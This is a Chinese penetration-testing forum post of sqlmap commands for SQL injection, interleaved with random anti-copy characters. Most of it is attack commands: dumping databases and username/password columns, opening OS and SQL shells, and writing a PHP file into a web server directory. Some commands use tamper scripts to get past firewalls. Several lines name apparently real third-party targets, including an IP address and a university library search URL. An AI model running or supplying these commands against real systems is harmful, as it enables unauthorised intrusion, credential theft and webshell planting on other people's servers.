中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap& p1 |* a) ^5 P& d& @

. N1 q& D$ k; {6 `( u8 iupdate :::::>     in the folder   after  execute    following   order : svn update7 @9 r$ z" [8 j& O& ~: c
$ I, {9 V1 _9 s1 U% U, j) T6 k
sqlmap.py -r 1.txt --current-db
2 x, [+ l: F6 @1 ?! w
- E6 \3 ]5 [5 E4 z4 o+ Uv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
, o& o0 Y1 z+ C: h7 g5 X9 f6 h# i
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
( v1 c) r* j$ B1 W* R猜解数据库
5 |) z4 W0 ]3 }& z+ v+ E./sqlmap.py -u "injection-url" --dbs7 m' h* }& D3 S& T; c) n
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
" X4 l" l' \' e4 s1 `& g6 I0 R$ w" U
) T( t1 u! U/ f! p; n3 N猜解表名
/ _& v: H0 S- f* h( \1 K0 S/ I! K./sqlmap.py -u "injection-url" -D database_name --tables0 E( ?+ G) A- A: ]
: T; |& `- S4 p
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
" A/ n2 F# J% x# q  t7 p; [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! A- G; N6 S- ^+ [% ?5 g" P2 \9 N/ {# N5 a% F0 f
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
# W5 q" O0 I; ^6 K+ I  L, M9 Y( J8 r' D8 G3 B# a
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"% s- v+ G. I4 F) |* A0 B6 U
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"* M+ N/ Y1 j: _, X6 g* \* f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" * N7 \9 {1 O" S& L& l/ f
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"9 p; h3 ~% `( m; f% h0 X

7 P3 w/ z" g3 u( ^sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
- ^% i8 {% s; M' ?sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
9 p* m# E! j3 l( w! nsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
' f+ p+ f) M4 W7 Ksqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"2 g' N* k+ T0 C" O' [3 k
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump: ^# g2 s$ c! @7 a, ?+ P

$ P; i( }6 l8 U( v1 d' h% x; Ysqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了) I; h9 D4 B& m- y
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
! `1 s. \) {, y# S6 }0 {# i2 |; ~, D. D* p
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
0 v: l) f% e1 t, l; m猜解列名5 P3 ]& `# R9 G
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns0 F# I( t# j3 _- R- F" |% l

8 Y. C6 b: D, N3 L& usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ( P9 w& s. Z6 G2 _* `: o9 s4 h9 _5 H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 8 I$ t2 j; d3 W5 W3 @7 r- n, n. B8 ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
3 y7 h+ Y# M6 R# y8 p0 s- N7 k8 n7 f& J2 k
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 n2 R5 C" n7 ]  Q- e: N&submit=Go2 {1 _' f, L2 v3 I- y3 D$ A% v
猜解值
- ~" T0 }7 J% {./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
. T0 x  y% o$ R) H/ s========================================================
+ t  |3 B2 V% E7 f3 u5 t! N/ Z; J搜索表名中包括mana字符的, y) f6 l/ C  q; T, B' V
/sqlmap.py -u "injection-url" -T mana --search
3 }% }0 f- K. p! K' ]返回一个交互式sql shell
0 p3 d3 K1 M- T4 C7 U/sqlmap.py -u "injection-url" --sql-shell
% S/ K# u& n" {: s# f4 M$ d$ C读取指定文件(需权限)
0 B/ R; X1 b$ j$ @. M4 e. M/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"" [# |! U% R! ]6 u
查看当前 用户 及 数据库 # Y, [: k; K( H1 L' ~5 x8 R6 U
/sqlmap.py -u "injection-url" --current-user --current-db
* Y6 l* q4 x8 L+ f. u0 Z1 `本地文件 写入 远程目标绝对路径, h3 g. f) v6 k" _2 o. T
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径/ V5 b) g  ^8 k( [
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
/ s2 t% J) N# P. F8 P' E0 M' `1 w( p) K
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
. g8 t( U' V+ K9 d) P" g9 F# v查看某用的权限  \; |, ]# i) v# n- j
/sqlmap.py -u "injection-url" --privileges -U root! F9 s; R: @/ g/ s- J3 i* S% s7 r
查看当前用户是否为dba
5 n. m% `  }4 `/sqlmap.py -u "injection-url" --is-dba6 ]4 u! }& `6 E9 X) O$ L# e. u3 {/ x
读取所有数据库用户或指定数据库用户的密码5 ~& k/ N8 ^% Q* z' E, E) y# X+ T0 o
sqlmap.py -r 1.txt --users --passwords8 u4 u1 C& A( D5 j! E
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
- t& N# t# q1 q7 |
8 I+ f8 I* i9 N& D' |+ M3 z/sqlmap.py -u "injection-url" --passwords -U root8 W* h# G. H) e, p
) G% Y& h8 W' \" Z
--start&&--stop 与 --first&&--last 的区别
2 Z9 a  D3 c- T5 ~# I0 q4 ~/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)3 g  M3 o9 p: C/ y! f& i  L% l
! O3 R: f% I0 I- @" N5 z2 p) Q. K
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt); ?0 U. L% P, O; Y) o
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
6 k9 R0 ~$ f/ J/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns3 W% e. y* u$ ?, E* m

( c+ y( f: ?8 N; J0 e执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% E/ b% Z2 W9 J8 G( T  a/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"6 E- y9 ]; L! ~* P; _7 D/ _
1 _% N1 ^" Q& n. X5 i6 k, `% v  x





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2